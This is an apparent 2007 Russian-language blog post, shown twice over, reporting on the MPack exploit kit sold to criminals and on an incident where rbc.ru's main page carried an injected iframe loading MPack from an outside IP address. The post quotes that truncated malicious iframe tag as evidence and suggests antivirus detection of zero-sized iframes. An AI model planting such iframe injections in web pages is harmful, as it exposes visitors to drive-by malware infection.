iss_shoo (![[info]](http://l-stat.livejournal.com/img/userinfo.gif){kind=small} iss_shoo) wrote,@ 2007-09-23 11:03:00 |
|
Русские друзья Большого Брата
Как известно, в настоящее время уважаемый Щеглов опубликовал серию постов, посвященных сетевой безопасности. Подробности - в его лентеschegloff.
Поэтому информация в его копилку.
В №702 "Компьютерры" появилась статья "Торговцы оружием". Через неделю-две статья появится и на сайте, ссылку отредактирую.
Если коротко, то:
Обнаружена новая версия 0.90 вредоносной утилиты Mpack, которая продается в интернете за 1000 долларов США. Это приложение можно назвать “набором для инсталляции вредоносного ПО с помощью эксплойтов”, поскольку оно способно загружать на ПК эксплойты для многочисленных брешей безопасности в браузерах Internet Explorer, Opera и Firefox.
Кибер-преступники даже предлагают бесплатную годовую поддержку тем, кто приобретает данную версию. Хакеры, желающие обновить Mpack новыми эксплойтами, могут приобрести их по стоимости от $50 до $150 за каждый.
Ежемесячные обновления включают новые, еще не закрытые заплатками, уязвимости.
Если кто то думает, что это не про него, прочитайте здесь:
"Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.
При детальном анализе оказалось, что на главной странице сайта содержался код
<iframe src="http://81.95.150.42/MPack091cbt/in
загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта."
Таким образом, цитируя одного из авторов КТ, Сергея Голубицкого "И за тобой тоже придут..."
С этой точки зрения, видимо стоит включить в антивирусные базы сигнатуру iframe с размерами 0 на 0. Кроме гадости и счетчиков, в такое окно ничего на поместят. А зачем мне счетчик?
Как известно, в настоящее время уважаемый Щеглов опубликовал серию постов, посвященных сетевой безопасности. Подробности - в его ленте
schegloff.Поэтому информация в его копилку.
В №702 "Компьютерры" появилась статья "Торговцы оружием". Через неделю-две статья появится и на сайте, ссылку отредактирую.
Если коротко, то:
Обнаружена новая версия 0.90 вредоносной утилиты Mpack, которая продается в интернете за 1000 долларов США. Это приложение можно назвать “набором для инсталляции вредоносного ПО с помощью эксплойтов”, поскольку оно способно загружать на ПК эксплойты для многочисленных брешей безопасности в браузерах Internet Explorer, Opera и Firefox.
Кибер-преступники даже предлагают бесплатную годовую поддержку тем, кто приобретает данную версию. Хакеры, желающие обновить Mpack новыми эксплойтами, могут приобрести их по стоимости от $50 до $150 за каждый.
Ежемесячные обновления включают новые, еще не закрытые заплатками, уязвимости.
Если кто то думает, что это не про него, прочитайте здесь:
"Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.
При детальном анализе оказалось, что на главной странице сайта содержался код
<iframe src="http://81.95.150.42/MPack091cbt/in
загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта."
Таким образом, цитируя одного из авторов КТ, Сергея Голубицкого "И за тобой тоже придут..."
С этой точки зрения, видимо стоит включить в антивирусные базы сигнатуру iframe с размерами 0 на 0. Кроме гадости и счетчиков, в такое окно ничего на поместят. А зачем мне счетчик?
